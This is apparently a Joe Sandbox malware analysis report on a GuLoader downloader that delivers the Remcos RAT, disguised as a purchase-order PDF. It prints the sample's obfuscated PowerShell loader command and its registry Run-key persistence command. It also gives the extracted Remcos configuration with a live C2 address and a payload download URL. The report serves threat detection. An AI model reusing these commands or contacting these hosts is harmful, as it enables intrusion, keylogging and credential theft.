Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P.O_Qouts_t87E90Y-E4R7G-PDF.exe

Overview

General Information

Sample name:P.O_Qouts_t87E90Y-E4R7G-PDF.exe
Analysis ID:1501073
MD5:c1c571c4f8f69d3c8aa0ec091173bd5e
SHA1:a36ac174f8ee2ed2254f69a21799837af58071f2
SHA256:d7cf40360b1dd35e6a20b8639f0fe9cc918157de07ff248983db6f0ee1472dbb
Tags:exe
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • P.O_Qouts_t87E90Y-E4R7G-PDF.exe (PID: 5636 cmdline: "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe" MD5: C1C571C4F8F69D3C8AA0EC091173BD5E)
    • powershell.exe (PID: 2292 cmdline: "powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wab.exe (PID: 356 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 5764 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 4440 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 2136 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\vcrnmdjhacaz" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 348 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\fwegnvuioksemqa" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 1576 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iykqoofccsljowohdo" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "45.95.169.18:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HP1D61", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.3515260679.000000000078E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000002.00000002.3167388642.000000000BD84000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Process Memory Space: wab.exe PID: 356JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              Click to see the 2 entries

              System Summary

              barindex
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 356, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", ProcessId: 5764, ProcessName: cmd.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 4440, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5764, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", ProcessId: 4440, ProcessName: reg.exe
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2292, TargetFilename: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 356, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Risikofriestes% -windowstyle minimized $Follikler=(Get-ItemProperty -Path 'HKCU:\Reattach237\').Kkkenredskab;%Risikofriestes% ($Follikler)", ProcessId: 5764, ProcessName: cmd.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" , CommandLine: "powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe", ParentImage: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exe, ParentProcessId: 5636, ParentProcessName: P.O_Qouts_t87E90Y-E4R7G-PDF.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized " $Fretum=Get-Content 'C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Ravelproof29\Wabeno.phy';$Llebrdsbarmhjertighedens42=$Fretum.SubString(56238,3);.$Llebrdsbarmhjertighedens42($Fretum)" , ProcessId: 2292, ProcessName: powershell.exe

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 356, TargetFilename: C:\ProgramData\remcos\logs.dat
              Timestamp:2024-08-29T12:03:58.254046+0200
              SID:2036594
              Severity:1
              Source Port:49741
              Destination Port:2404
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-29T12:03:56.580269+0200
              SID:2036594
              Severity:1
              Source Port:49740
              Destination Port:2404
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-29T12:03:58.139846+0200
              SID:2803304
              Severity:3
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-08-29T12:03:58.189647+0200
              SID:2036594
              Severity:1
              Source Port:49742
              Destination Port:2404
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-29T12:03:38.346605+0200
              SID:2803270
              Severity:2
              Source Port:49738
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-08-29T12:03:58.189648+0200
              SID:2036594
              Severity:1
              Source Port:49744
              Destination Port:2404
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "45.95.169.18:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HP1D61", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: 45.95.169.18Virustotal: Detection: 10%Perma Link
              Source: http://z194668-ex70k.ps02.zwhhosting.com/PFaQcsFKEopza178.binVirustotal: Detection: 7%Perma Link
              Source: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exeReversingLabs: Detection: 50%
              Source: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exeVirustotal: Detection: 45%Perma Link
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeReversingLabs: Detection: 50%
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeVirustotal: Detection: 45%Perma Link
              Source: Yara matchFile source: 00000009.00000002.3519866024.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3515260679.000000000078E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3519866024.00000000083BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 356, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Intervisibility\P.O_Qouts_t87E90Y-E4R7G-PDF.exeJoe Sandbox ML: detected
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeJoe Sandbox ML: detected
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: P.O_Qouts_t87E90Y-E4R7G-PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb'< source: powershell.exe, 00000002.00000002.3166817817.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.3164302379.00000000078D9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb-C source: powershell.exe, 00000002.00000002.3166817817.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: %]qm.Core.pdb6? source: powershell.exe, 00000002.00000002.3166817817.0000000008A80000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.3164302379.00000000078D9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb52 source: powershell.exe, 00000002.00000002.3164302379.00000000078D9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.3164302379.0000000007975000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.3164302379.00000000078D9000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_00406435 FindFirstFileA,FindClose,0_2_00406435
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_00405889 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405889
              Source: C:\Users\user\Desktop\P.O_Qouts_t87E90Y-E4R7G-PDF.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_23DC10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 9_2_23DC6580 FindFirstFileExA,9_2_23DC6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Vandskellenes\Tramp\drejebnksvrktjets\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Vandskellenes\Tramp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Vandskellenes\Jump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49740 -> 45.95.169.18:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49741 -> 45.95.169.18:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49742 -> 45.95.169.18:2404
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49744 -> 45.95.169.18:2404
              Source: Malware configuration extractorURLs: 45.95.169.18
              Source: global trafficTCP traffic: 192.168.2.5:49740 -> 45.95.169.18:2404
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: GIGANET-HUGigaNetInternetServiceProviderCoHU GIGANET-HUGigaNetInternetServiceProviderCoHU
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49743 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49738 -> 118.27.130.234:80
              Source: global trafficHTTP traffic detected: GET /PFaQcsFKEopza178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: z194668-ex70k.ps02.zwhhosting.comCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: unknownTCP traffic detected without corresponding DNS query: 45.95.169.18
              Source: global trafficHTTP traffic detected: GET /PFaQcsFKEopza178.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: z194668-ex70k.ps02.zwhhosting.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: wab.exe, 0000000D.00000003.3223017057.0000000003339000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.3224808710.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
